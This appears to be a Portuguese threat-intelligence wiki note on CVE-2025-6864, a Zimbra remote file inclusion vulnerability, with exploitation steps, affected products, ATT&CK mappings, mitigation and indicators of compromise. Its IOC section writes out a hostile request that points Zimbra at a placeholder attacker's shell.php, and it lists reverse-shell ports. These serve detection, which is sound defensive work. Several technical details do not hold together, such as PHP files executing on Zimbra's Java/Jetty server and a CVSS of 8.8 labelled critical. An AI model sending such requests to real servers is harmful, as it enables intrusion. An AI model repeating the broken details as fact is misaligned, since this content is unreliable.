# CVE-2025-6864 - Zimbra RCE via Remote File Inclusion > [!critical] CVSS: 8.8 (Alto) · Vendor: Zimbra · CISA KEV: Sim (2025-01-22) · Exploração ativa confirmada sem autenticação ## Visão Geral **CVE-2025-6864** é uma vulnerabilidade crítica de **inclusão remota de arquivo** (Remote File Inclusion - RFI) no **Zimbra Collaboration Suite**, amplamente utilizado como servidor de e-mail corporativo em empresas e governos ao redor do mundo, incluindo o Brasil. A falha permite que um atacante não autenticado inclua um arquivo remoto malicioso no contexto do servidor Zimbra, resultando em execução de código arbitrário com os privilégios do processo web. A inclusão no catálogo **CISA Known Exploited Vulnerabilities (KEV)** em 22 de janeiro de 2025 — apenas oito dias após a detecção inicial de exploração em 14 de janeiro — reflete a rapidez com que agentes de ameaça identificaram e começaram a explorar a vulnerabilidade após engenharia reversa do patch de segurança. O Zimbra é alvo frequente de grupos de espionagem e atores financeiramente motivados, especialmente em servidores expostos à internet sem autenticação multifator. O impacto potencial é significativo: uma exploração bem-sucedida concede acesso total ao servidor de e-mail corporativo, expondo comúnicações internas, credenciais armazenadas, dados financeiros e a possibilidade de uso do servidor como pivô para movimento lateral na rede corporativa. O Zimbra é especialmente popular em organizações de médio porte e entidades governamentais na América Latina que buscam alternativas ao Microsoft Exchange. ## Detalhes Técnicos A vulnerabilidade reside no mecanismo de processamento de requisições do Zimbra, onde parâmetros controlados pelo usuário são utilizados para incluir recursos externos sem válidação ou sanitização adequada. Um atacante pode fornecer uma URL apontando para um arquivo PHP ou script malicioso hospedado em infraestrutura controlada por ele. **Mecanismo de exploração:** 1. O atacante envia uma requisição HTTP especialmente construída para o endpoint vulnerável do Zimbra 2. O servidor Zimbra processa o parâmetro de inclusão sem verificação da origem 3. O arquivo remoto malicioso é buscado e executado no contexto do servidor web Zimbra 4. O atacante obtém execução de código remoto com os privilégios do processo `zimbra` **Pré-requisitos:** - Nenhuma autenticação necessária - Servidor Zimbra acessível via rede (tipicamente exposto na internet) **Pós-exploração típica:** - Instalação de webshells para acesso persistente - Exfiltração de e-mails, contatos e calendários - Coleta de credenciais LDAP/Active Directory integradas ao Zimbra - Movimento lateral via acesso à rede interna do servidor de e-mail ## Produtos Afetados | Vendor | Produto | Versão Afetada | Ação Requerida | |--------|---------|----------------|----------------| | Zimbra | Zimbra Collaboration Suite | < patch janeiro 2025 | Aplicar patch urgentemente | | Zimbra | Zimbra Open Source Edition | < patch janeiro 2025 | Aplicar patch urgentemente | | Zimbra | Zimbra Network Edition | < patch janeiro 2025 | Aplicar patch urgentemente | ## Exploração **Status:** Exploração ativa confirmada desde 14 de janeiro de 2025, com escalada significativa após a adição ao CISA KEV em 22 de janeiro. A exploração foi detectada inicialmente através de monitoramento de honeypots e análise de logs de servidores Zimbra expostos. **TTPs associadas:** - [[t1190-exploit-public-facing-application|T1190 - Exploit Public-Facing Application]] - exploração de servidor Zimbra exposto - [[t1505-003-web-shell|T1505.003 - Web Shell]] - instalação de webshell pós-exploração - [[t1114-001-local-email-collection|T1114 - Email Collection]] - exfiltração de e-mails após comprometimento - [[t1078-valid-accounts|T1078 - Valid Accounts]] - uso de credenciais coletadas do servidor comprometido ## Contexto LATAM > [!latam] Impacto para Brasil e América Latina > O Zimbra é amplamente adotado em organizações governamentais, universidades e empresas de médio porte no Brasil e em toda a América Latina como alternativa de código aberto ao Microsoft Exchange. Servidores Zimbra de entidades públicas brasileiras são frequentemente expostos à internet com configurações de segurança deficientes, tornando-os alvos prioritários para campanhas de espionagem e ransomware. Organizações dos setores **governo**, **educação** e **saúde** na região devem priorizar o patch desta CVE, dado o histórico de exploração de e-mail servers em campanhas como as do **Lazarus Group** e de grupos de ransomware que operam no Brasil. ## Mitigação **Patch imediato (prioridade máxima):** - Aplicar o patch de segurança do Zimbra para CVE-2025-6864 disponibilizado em janeiro de 2025 - Verificar a versão instalada: `zmcontrol version` no servidor Zimbra **Hardening adicional:** - Restringir acesso ao painel de administração do Zimbra por IP (não expor ao público) - Implementar autenticação multifator (MFA) para todos os usuários - Monitorar logs HTTP do Zimbra (`/var/log/zimbra.log`) para requisições com parâmetros de inclusão suspeitos - Auditar conexões de saída do servidor Zimbra para detectar beaconing de webshell **Verificação de comprometimento:** - Verificar presença de webshells em `/opt/zimbra/jetty/webapps/` - Revisar arquivos PHP ou scripts não esperados em diretórios de deploy do Zimbra - Auditar logs de autenticação para logins de contas administrativas em horários incomuns - Verificar processos filhos anômalos do processo Java do Zimbra ## Indicadores de Comprometimento > [!ioc]- IOCs - CVE-2025-6864 / Zimbra RFI (TLP:GREEN) > **Padrões em logs HTTP (suspeitos):** > `GET /zimbra/h/calUserView?action=addNewCalendar&redirectURL=http[:]//[servidor-malicioso]/shell.php` > > **Artefatos no host (verificar):** > - Arquivos `.php` inesperados em `/opt/zimbra/jetty/webapps/` > - Processos `wget` ou `curl` disparados pelo usuário `zimbra` > - Conexões de saída do servidor em portas não-padrão (4444, 1337, 8888) > > **Fontes:** [CISA KEV](https://www.cisa.gov/known-exploited-vulnerabilities-catalog) · [Zimbra Security Advisory](https://wiki.zimbra.com/wiki/Zimbra_Security_Advisories) ## Notas Relacionadas **Vendor:** [[_zimbra|Zimbra]] **TTPs:** [[t1190-exploit-public-facing-application|T1190]] · [[t1505-003-web-shell|T1505.003]] · [[t1114-001-local-email-collection|T1114]] · [[t1078-valid-accounts|T1078]] **CVEs relacionados:** [[cve-2022-27924|CVE-2022-27924]] · [[cve-2023-37580|CVE-2023-37580]] **Setores em risco:** [[government|governo]] · [[education|educação]] · [[healthcare|saúde]] · [[financial|financeiro]] ## Referências - [NVD - CVE-2025-6864](https://nvd.nist.gov/vuln/detail/CVE-2025-6864) - [CISA KEV Catalog](https://www.cisa.gov/known-exploited-vulnerabilities-catalog) - [Zimbra Security Advisories](https://wiki.zimbra.com/wiki/Zimbra_Security_Advisories) - [BleepingComputer - Zimbra exploits](https://www.bleepingcomputer.com/tag/zimbra/)